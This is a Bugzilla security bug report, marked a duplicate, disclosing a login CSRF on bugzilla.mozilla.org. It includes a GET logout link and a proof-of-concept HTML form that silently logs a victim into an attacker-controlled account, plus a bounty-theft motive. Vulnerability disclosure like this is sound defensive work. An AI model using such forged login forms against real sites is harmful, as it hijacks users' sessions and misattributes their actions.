963687 - Switching a user to another account

Status: RESOLVED DUPLICATE of bug 713926

(Bugzilla :: User Accounts, defect)

Description

[Dawid Czagan]

User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)

Steps to reproduce:

It is possible to log in the user to another account (CSRF attack). Steps to reproduce: User logs in to his account and then the following actions are performed:
1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log the user to another account. POC (for demonstration purposes with Submit button; normally sent automatically):

<html>
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="E-MAIL_ATTACKER" />
      <input type="hidden" name="Bugzilla&#95;password" value="PASSWORD_ATTACKER" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

It is assumed, that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists.

There might be different reasons for the attacker to launch this attack. An exemplary one is getting a credit/bounty for a submitted bug (The attacker logs the user into his account. The user thinks, that he uses his own account and submits a bug. The action is done from the attacker's account and the credit/bounty goes to the attacker).

Regards,
Dawid Czagan